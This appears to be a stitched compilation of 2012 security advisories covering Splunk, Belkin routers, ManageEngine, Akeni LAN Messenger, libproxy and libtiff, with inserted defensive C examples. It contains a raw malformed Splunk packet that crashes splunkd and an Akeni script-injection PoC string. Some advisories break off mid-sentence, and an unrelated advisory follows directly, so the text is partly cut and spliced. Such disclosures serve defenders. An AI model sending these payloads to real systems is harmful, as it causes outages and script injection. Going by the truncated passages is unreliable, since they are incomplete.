n.runs-SA-2012.004 - SPLUNK Unauthenticated remote DoS

n.runs AG                                           http://www.nruns.com/
security(at)nruns.com                               n.runs-SA-2012.004
                                                    19-Nov-2012

Vendors:        Splunk Inc., http://www.splunk.com
Product:        Splunk 4.0 - 4.3.4
Vulnerability:  Unauthenticated remote denial of service against splunkd
Tracking IDs:   SPL-55521

Vendor communication:
  2012/09/03  Reported the issue via Splunk's website
  2012/09/04  Splunk responds and assigns tracking ID, plans fix for 4.3.5
  2012/10/25  Splunk informs us that 5.0 will be available on November 1st
              and 4.3.5 on November 15th. Proposes to defer announcement of
              the vulnerability to ensure that people aren't forced to move
              to a new major release in order to mitigate. n.runs agrees.

Overview:
When a splunktcp input (used for Splunk-to-Splunk communication) is
configured, an attacker can send an initial packet with a malformed
'__s2s_capabilities' field. This crashes the splunkd daemon and makes the
splunktcp input unavailable. If the Splunk web interface is running on the
same host, it becomes unavailable too, as it needs to communicate with
splunkd.

Description:
An example packet looks like this (__s2s_capabilities is just 'A' here):

"--splunk-cooked-mode-v3--\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0.\0\0\0\SOH\0\0\0\DC3__s2s_capabilities\0\0\0 \0\STXA\0\0\0\0\0\0\0\0\ENQ_raw\0"

When this packet is sent multiple times, splunkd eventually crashes with a
crash log similar to this one:

[build 128297] 2012-08-30 13:34:01
Access violation, cannot read at address [0x6A62]
Exception address: [0x6FC4500A]
Crashing thread: TcpInputProcessor
ContextFlags: [0x0001007F]
Dr0: [0x]  Dr1: [0x]  Dr2: [0x]  Dr3: [0x]  Dr6: [0x]  Dr7: [0x]
SegGs: [0x]  SegFs: [0x003B]  SegEs: [0x0023]  SegDs: [0x0023]
Edi: [0x099F0020]  Esi: [0x6A62]  Ebx: [0x08BD5680]  Edx: [0x0001]
Ecx: [0x01734000]  Eax: [0x05CD6A63]  Ebp: [0x03B0F9C4]
Eip: [0x6FC4500A] memcpy + 90/880
SegCs: [0x001B]  EFlags: [0x00010212]  Esp: [0x03B0F9BC]  SegSs: [0x0023]
OS: Windows
Arch: i386
Backtrace:
  Frame 0 @[0x03B0F9C4]: [0x6FC80475] memcpy_s + 72/123
  Frame 1 @[0x03B0F9E0]: [0x67DA1201] std::char_traits::_Copy_s + 21/29
  Frame 2 @[0x03B0F9F8]: [0x67DA394D] std::basic_string, std::allocator>::assign + 126/146
  Frame 3 @[0x03B0FA1C]: [0x67DA5E45] std::basic_string, std::allocator >::operator= + 13/16
  Frame 4 @[0x05CD287C]: [0x6A62] ?
  Frame 5 @[0x0064656B]: (Frame below stack)
Crash dump written to: C:\Program Files\Splunk\var\log\splunk\C__Program Files_Splunk_bin_splunkd_exe_crash-2012-08-30-13-34-01.dmp
XXX /6.1 Service Pack 1
Threads running: 36
argv: [Splunkd -p 8089]
terminating...

Further analysis showed that the crash is indeed triggered by an incorrect
source address in a fastcopy_I call. It is unclear where this address comes
from, though, and why the crash only happens after a certain number of
packets.

Impact:
Denial of service of splunkd (and possibly the Splunk web interface,
depending on configuration) until splunkd is restarted.

Fixes:
This issue has been fixed in Splunk 4.3.5 and 5.0.

Credits:
Alexander Klink, n.runs AG (discovery)
Moritz Jodeit, n.runs AG (further analysis)

References:
This advisory and upcoming advisories:
http://www.nruns.com/security_advisory.php

About n.runs:
n.runs AG is a vendor-independent consulting company specializing in the
areas of IT Infrastructure, IT Security and IT Business Consulting.

Copyright Notice:
Unaltered electronic reproduction of this advisory is permitted. For all
other reproduction or publication, in print
CVE-2012-4366: Insecure default WPA2 passphrase in multiple Belkin wireless routers

I. Background

Belkin ships many wireless routers with an encrypted wireless network
configured by default. The network name (ESSID) and the (seemingly random)
password are printed on a label at the bottom of the device.

II. Description of vulnerability

Having a preconfigured, randomly generated WPA2-PSK passphrase for wireless
routers is basically a good idea, since a vendor-generated passphrase can be
much more secure than most user-generated passwords. However, in the case of
Belkin the default password is calculated solely from the MAC address of the
device. Since the MAC address is broadcast in the beacon frames sent out by
the device, a wireless attacker can calculate the default passphrase and then
connect to the wireless network.

Each of the eight characters of the default passphrase is created by
substituting a corresponding hex digit of the WAN MAC address using a static
substitution table. Since the WAN MAC address is the WLAN MAC address plus
one or two (depending on the model), a wireless attacker can easily guess the
WAN MAC address of the device and thus calculate the default WPA2 passphrase.

Moreover, the default WPA2-PSK passphrase consists solely of 8 hexadecimal
digits, which means that the entropy is limited to only 32 bits (or 33 bits,
since some models use uppercase hex digits). After sniffing one successful
association of a client to the wireless network, an attacker can carry out an
offline brute-force attack to crack the password. The program oclhashcat-plus
can try 131,000 passwords per second on one high-end GPU (AMD Radeon HD 7970)
[1]. A full search of the 32-bit key space takes about 9 hours at this rate.

III. Impact

An attacker can exploit this vulnerability to calculate the WPA2-PSK
passphrase of a wireless network. This allows sniffing and decrypting all
wireless traffic in a purely passive attack, given that the attacker has also
sniffed the association. The attacker may also connect to the wireless
network, which may allow further exploitation of unprotected systems in the
local network. An attacker may furthermore use the wireless network to access
the internet from the owner's network. The network owner may then be held
responsible for any illegal activities perpetrated by the unauthorized users.

IV. Affected devices

Belkin Surf N150 Model F7D1301v1

The official Belkin support page [2] contains pictures of the label of
several other WiFi devices, which show that the following devices are
vulnerable as well:

Belkin N900 Model F9K1104v1
Belkin N450 Model F9K1105V2

The following device uses a variation of the algorithm, and its password
consists of uppercase hex digits. When using our algorithm with the WLAN MAC
of the device, the first 5 digits of the password are calculated correctly.
It is likely that the algorithm differs only in the tables used.

Belkin N300 Model F7D2301v1

It is likely that other Belkin devices are affected as well. Unfortunately,
Belkin has not yet cooperated with us to fix the vulnerability and/or confirm
a list of other affected devices. If you own a Belkin wireless router and
want to know whether it is vulnerable as well, you should change the
passphrase and then send me the relevant data (model number, WAN/WLAN MAC
address and the original default WPA2 passphrase).

V. Solution

Users of potentially affected wireless routers should change the wireless
passphrase to something more secure.

VI. Timeline

6.1.2012:   Vendor contacted
27.1.2012:  Escalated
29.10.2012: Another contact attempt, still no response
19.11.2012: Public disclosure

VII. Credits

Jakob Lell
Jörg Schneider

VIII. References

Advisory location: http://www.jakoblell.com/blog/?p=15
CVE-2012-4366: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4366
[1] http://hashcat.net/oclhashcat-plus/
[2] http://en-us-support.belkin.com/app/answers/detail/a_id/6989
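The key-space argument above, as an added example (not part of the advisory): a defender-side check that flags a WPA2 passphrase matching the 8-hex-digit default pattern described here and estimates the exhaustive-search time at the advisory's quoted 131,000 guesses/s. The pattern test is a heuristic; it does not reproduce the vendor's substitution table, which the advisory does not publish, and the sample passphrases are constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define BELKIN_DEFAULT_LEN    8
#define HASHCAT_RATE_PER_SEC  131000.0  /* rate quoted in the advisory */

/* Returns the number of key-space bits an attacker must search when the
 * passphrase follows the default pattern: 32 for 8 lowercase hex digits,
 * 33 when the digits are uppercase (the attacker must also guess the case,
 * as the advisory notes for some models). Returns 0 if the passphrase does
 * not match the pattern at all (wrong length, non-hex or mixed case). */
int belkin_default_keyspace_bits(const char *passphrase)
{
    int has_upper = 0, has_lower = 0;
    if (strlen(passphrase) != BELKIN_DEFAULT_LEN)
        return 0;
    for (const char *p = passphrase; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (!isxdigit(c))
            return 0;
        if (isupper(c)) has_upper = 1;
        if (islower(c)) has_lower = 1;
    }
    if (has_upper && has_lower)
        return 0;               /* mixed case is not the vendor pattern */
    return has_upper ? 33 : 32;
}

/* Hours needed to exhaust a key space of `bits` bits at `rate_per_sec`
 * guesses per second; -1.0 for an unsupported bit count. For 32 bits at
 * 131,000/s this is about 9.1 hours, the "about 9 hours" in the advisory. */
double exhaustive_search_hours(int bits, double rate_per_sec)
{
    if (bits < 0 || bits > 62 || rate_per_sec <= 0.0)
        return -1.0;
    return (double)(1ULL << bits) / rate_per_sec / 3600.0;
}

int main(void)
{
    /* Constructed sample values, not real device passphrases. */
    const char *samples[] = { "3a7f91c0", "3A7F91C0", "Tr0ub4dor&3" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int bits = belkin_default_keyspace_bits(samples[i]);
        if (bits == 0)
            printf("%-12s does not match the 8-hex-digit default pattern\n",
                   samples[i]);
        else
            printf("%-12s %d-bit key space, ~%.1f hours at %.0f guesses/s\n",
                   samples[i], bits,
                   exhaustive_search_hours(bits, HASHCAT_RATE_PER_SEC),
                   HASHCAT_RATE_PER_SEC);
    }
    return 0;
}
```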
Manage Engine Exchange Reporter v4.1 - Multiple Web Vulnerabilities

Title:
======
Manage Engine Exchange Reporter v4.1 - Multiple Web Vulnerabilities


Date:
=====
2012-11-14


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=688


VL-ID:
=====
688


Common Vulnerability Scoring System:
====================================
4.5


Introduction:
=============
Microsoft Exchange Server is, by a distance, the most popular communication, collaboration and
email messaging application today! MS Exchange serves as the hub of all email communications in
most corporate environments that use the Microsoft Active Directory technology. It becomes a
necessity to have an Exchange reporting tool that will equip an Exchange Administrator with
precise, granular, comprehensive and actionable data on all aspects of the MS Exchange Server.

Exchange Reporter Plus
ManageEngine Exchange Reporter Plus is a web-based analysis and reporting solution for Microsoft
Exchange Servers. Exchange Reporter Plus is a comprehensive and complete MS Exchange reporting
software that provides over 70 different reports on every aspect of the Microsoft Exchange Server
environment. The range includes reports of crucial importance. A few of the many vital Exchange
tasks that can be performed using Exchange Reporter Plus are listed below.

Track incoming and outgoing emails, monitor mailbox size and keep spam away from Active Directory
mailboxes with Mailbox Traffic, Mailbox Content, and Mailbox Size Reports.
Keep a tab on the number of messages sent and received by each Exchange server using Server
Traffic Reports.
Monitor the vital statistics of Exchange Server Public Folders with comprehensive Public Folder
Reports.
Generate reports on Distribution Lists and also show the traffic for each distribution by running
the Distribution Lists Traffic Report!

Exchange Reporter Plus presents these reports in an easily comprehensible format, so that even
technically naive users will have no hassles creating and interpreting them. In addition to
generating these reports in the wink of an eye, it also facilitates exporting these reports. The
reports can be downloaded as xls, csv, pdf or html files for further activities. Curious to know
more?? Try Exchange Reporter Plus hands-on in our Live Demo!

(Copy of the Vendor Homepage: http://www.manageengine.com/products/exchange-reports/index.html )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in Exchange
Reporter Plus v4.1.


Report-Timeline:
================
2012-08-26: Researcher Notification & Coordination
2012-08-27: Vendor Notification 1
2012-10-30: Vendor Notification 2
2012-11-07: Vendor Response/Feedback
2012-11-14: Public or Non-Public Disclosure


Status:
========
Published


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
1.1
A persistent input validation vulnerability was detected in Exchange Reporter Plus v4.1, a
web-based analysis and reporting solution. The bug allows remote attackers to inject malicious
script code on the application side (persistent). The persistent vulnerability is located in the
Schedule New Report module with the bound vulnerable Schedule Name and Schedule Description
parameters. Successful exploitation of the vulnerability can lead to session hijacking
(manager/admin) or stable (persistent) context manipulation. Exploitation requires low user
interaction and a privileged user account.

Vulnerable Module(s):
				[+] Schedule New Report

Vulnerable Parameter(s):
				[+] Schedule Name
				[+] Schedule Description


1.2
Multiple non-persistent cross-site scripting vulnerabilities were detected in Exchange Reporter
Plus v4.1, a web-based analysis and reporting solution. The vulnerabilities allow remote attackers
to hijack website customer, moderator or admin sessions with medium or high required user
interaction or a local low-privileged user account. The first vulnerability is located in
ReportsIndex.do with the bound vulnerable reportCategoryID parameter. The second vulnerability is
located in the search box for reports. Successful exploitation can result in account theft,
client-side phishing and client-side content request manipulation.

Vulnerable Module(s):
				[+] Reports

Vulnerable File(s):
				[+] ReportsIndex.do

Vulnerable Parameter(s):
				[+] reportCategoryID
				[+] search report


Proof of Concept:
=================
1.1
The persistent input validation vulnerability can be exploited by remote attackers with low
required user interaction and a low-privileged user account. For demonstration or reproduction ...

The attacker schedules a new report and inserts his own malicious JavaScript or HTML code in the
schedule name and schedule description. Then inject the malicious script code, i.e., when the user
browses the alarms
Akeni LAN v1.2.118 - Filter Bypass Vulnerability (Local)

Title:
======
Akeni LAN v1.2.118 - Filter Bypass Vulnerability


Date:
=====
2012-11-14


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=761


VL-ID:
=====
761


Common Vulnerability Scoring System:
====================================
3.3


Introduction:
=============
Akeni LAN Messenger is an IM system designed for your LAN. It is easy to set up and does not
require a dedicated server or Internet connection. The rich client supports chat, notification,
conferencing, and file transfer. For those who also need authentication and encryption, please
take a look at our Expert and Pro products. If your organization needs a web-based solution that
requires no client-side installation of software, please take a look at our Web Chat.

Due to the peer-to-peer nature of the product, there is no single point of failure and there is no
need for any network setup. This makes Akeni LAN Messenger a good solution for dynamic environments
where two people can communicate with one another as long as the network itself is up and running.
For example, LAN Messenger can be used by IT support personnel who need a way to communicate and
send files to each other anywhere in their network easily, without the need to connect to the
Internet or to a centralized server.

(Copy of the Vendor Website: http://www.akeni.com/en/product/lanmessenger.php )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered a filter bypass software vulnerability in
the official Akeni LAN (LE) Messenger v1.2.118.


Report-Timeline:
================
2012-11-14: Public or Non-Public Disclosure


Status:
========
Published


Exploitation-Technique:
=======================
Local


Severity:
=========
Medium


Details:
========
A filter bypass software vulnerability was detected in the official Akeni LAN (LE) Messenger
v1.2.118. The bug allows local attackers to inject their own malicious persistent script code on
the application side.

The vulnerability is located in the Akeni `incorrect length` exception-handling module with the
bound vulnerable groupname (Gruppenname) parameter. The filter of the Akeni LAN Messenger
sanitizes malicious tags and evil frame context but does not recognize a second request part that
is split off by %20 after the first. The attacker can provoke a first parse by injecting, for
example, a >`` to match the invalid-exception criteria. After the provocation he splits the
request with %20 and injects his own tags directly after it. The result is persistent script code
execution out of the invalid-length and invalid-parameter software exception handling.

Vulnerable Module(s):
				[+] Menu > Action > Contact List > Add Group

Vulnerable Parameter(s):
				[+] Incorrect Length - Exception-Handling
				[+] Invalid Context - Exception-Handling


Proof of Concept:
=================
The vulnerability can be exploited by local attackers without required user interaction.
For demonstration or reproduction ...

1. Let us watch the exception handling of the invalid length. First we inject a standard iframe
like >"

[>"'>] has incorrect length. Groups name must have between %2 and %3 characters.

... the validation of the incorrect length or invalid parameter redisplays the message but parses
the iframe tag. We can see in the parse the >" which is split from the parse itself and shows that
there could be an injection possibility.

1.2 The next step will be to split the request. HOW?! We inject a standard iframe () split the
request with %20 (Space) and inject the second script code after the split.

PoC: String: >"<%20>"http://www.vulnerability-lab.com/gfx/logo-header.png>

--- Exception Logs (Bypass) ---
[>""] has incorrect length. Groups name must have between 30 and %3 characters.


Risk:
=====
The security risk of the local persistent software vulnerability is estimated as medium(-).


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty.
Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties
of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are
not liable in any case of damage, including direct, indirect, incidental, consequential loss of
business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of
liability for consequential or incidental damages so the foregoing limitation may not apply. We do
not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into
databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   - www.vuln-lab.com
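The bug class in the Akeni advisory above (a filter that handles only the first part of a value, and an error message that echoes the rejected value), as an added example that is not Akeni's code: `naive_sanitize` is a hypothetical reconstruction of the described behaviour, stripping markup only from the first whitespace-separated token; `safe_group_name_error` shows the hardened handling, checking the whole value and HTML-escaping it before it is echoed in the "incorrect length" message. The length bounds are assumed (the advisory's messages show unfilled `%2`/`%3` placeholders), and the test inputs are constructed.

```c
#include <stdio.h>
#include <string.h>

#define GROUP_NAME_MIN 2    /* assumed bounds, not the product's real limits */
#define GROUP_NAME_MAX 30

/* Returns 1 if `s` contains any character that could open or close markup. */
int contains_markup(const char *s)
{
    return strpbrk(s, "<>\"'") != NULL;
}

/* Hypothetical flawed sanitizer modelled on the advisory: it strips markup
 * characters only from the first whitespace-separated token, so anything
 * after a space (%20 in the request) passes through untouched. */
void naive_sanitize(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    int past_first_token = 0;
    for (; *in && o + 1 < outsz; in++) {
        if (*in == ' ')
            past_first_token = 1;
        if (!past_first_token && strchr("<>\"'", *in))
            continue;           /* dropped only within the first token */
        out[o++] = *in;
    }
    out[o] = '\0';
}

/* HTML-escapes all of `in` into `out`. Returns 0 on success, -1 if `out`
 * is too small (output is then truncated but still NUL-terminated). */
int html_escape(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    for (; *in; in++) {
        const char *rep = NULL;
        switch (*in) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t len = rep ? strlen(rep) : 1;
        if (o + len + 1 > outsz) { out[o] = '\0'; return -1; }
        if (rep) memcpy(out + o, rep, len); else out[o] = *in;
        o += len;
    }
    out[o] = '\0';
    return 0;
}

/* Hardened handling: validate length and markup over the entire value and
 * escape it before echoing it. Returns 1 when the name is rejected (`msg`
 * then holds a message safe to render), 0 when it is accepted. */
int safe_group_name_error(const char *name, char *msg, size_t msgsz)
{
    size_t n = strlen(name);
    char esc[256];
    if (n >= GROUP_NAME_MIN && n <= GROUP_NAME_MAX && !contains_markup(name))
        return 0;
    if (html_escape(name, esc, sizeof esc) != 0)
        strcpy(esc, "(value too long to display)");
    snprintf(msg, msgsz, "[%s] has incorrect length or invalid characters. "
             "Group names must have between %d and %d characters.",
             esc, GROUP_NAME_MIN, GROUP_NAME_MAX);
    return 1;
}
```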
[ MDVSA-2012:172 ] libproxy

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2012:172
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : libproxy
 Date    : November 19, 2012
 Affected: 2011.
 _______________________________________________________________________

 Problem Description:

 A vulnerability has been discovered and corrected in libproxy:

 Stack-based buffer overflow in the url::get_pac function in url.cpp in
 libproxy 0.4.x before 0.4.9 allows remote servers to have an unspecified
 impact via a large proxy.pac file (CVE-2012-4504).

 The updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4504
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2011:

 Mandriva Linux 2011/X86_64:
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

 http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

 security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
[SECURITY] [DSA 2575-1] tiff security update

-------------------------------------------------------------------------
Debian Security Advisory DSA-2575-1                   secur...@debian.org
http://www.debian.org/security/                                Nico Golde
November 18, 2012                      http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : tiff
Vulnerability  : heap-based buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE ID         : CVE-2012-4564

It was discovered that ppm2tiff of the tiff tools, a set of utilities for
TIFF manipulation and conversion, does not properly check the return value
of an internal function used to detect integer overflows. As a consequence,
ppm2tiff suffers from a heap-based buffer overflow. This allows an attacker
to potentially execute arbitrary code via a crafted PPM image, especially in
scenarios in which images are automatically processed.

For the stable distribution (squeeze), this problem has been fixed in
version 3.9.4-5+squeeze7.

For the testing distribution (wheezy), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 4.0.2-5.

We recommend that you upgrade your tiff packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
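The defect class behind DSA-2575-1 (an ignored overflow check in an image-size computation, leading to an undersized heap buffer), as an added example that is not libtiff's or ppm2tiff's code: `image_buffer_size` computes width x height x samples x bytes-per-sample with every multiplication checked, `alloc_image_buffer` allocates only when that check passes, and `unchecked_size32` shows the silent wrap that a caller gets when the check result is ignored. The dimensions in the comments are illustrative.

```c
#include <stdint.h>
#include <stdlib.h>
#include <stddef.h>

/* Multiply a by b into *out. Returns 0 on success, -1 if the product would
 * not fit in size_t. This is the check whose result must not be ignored. */
int checked_mul_size(size_t a, size_t b, size_t *out)
{
    if (a != 0 && b > SIZE_MAX / a)
        return -1;
    *out = a * b;
    return 0;
}

/* Byte size of an image buffer for the given geometry. Returns 0 and
 * stores the size in *out on success, -1 on overflow or a zero dimension.
 * bps is bits per sample; (bps + 7) / 8 rounds up to whole bytes. */
int image_buffer_size(uint32_t width, uint32_t height,
                      uint16_t spp, uint16_t bps, size_t *out)
{
    size_t n;
    if (width == 0 || height == 0 || spp == 0 || bps == 0)
        return -1;
    if (checked_mul_size(width, height, &n) != 0)
        return -1;
    if (checked_mul_size(n, spp, &n) != 0)
        return -1;
    if (checked_mul_size(n, (size_t)((bps + 7) / 8), &n) != 0)
        return -1;
    *out = n;
    return 0;
}

/* Allocates the image buffer only when the size computation is sound, so
 * the later copy of pixel data can never exceed what was allocated.
 * Returns NULL (and leaves *out_len untouched) on overflow. */
unsigned char *alloc_image_buffer(uint32_t width, uint32_t height,
                                  uint16_t spp, uint16_t bps, size_t *out_len)
{
    size_t n;
    if (image_buffer_size(width, height, spp, bps, &n) != 0)
        return NULL;
    *out_len = n;
    return malloc(n);
}

/* The unsafe pattern for contrast: 32-bit arithmetic wraps modulo 2^32, so
 * a 65536 x 65536 x 3 image yields 0 and malloc(0) would be followed by a
 * heap write of the real pixel data. */
uint32_t unchecked_size32(uint32_t width, uint32_t height, uint16_t spp)
{
    return width * height * spp;
}
```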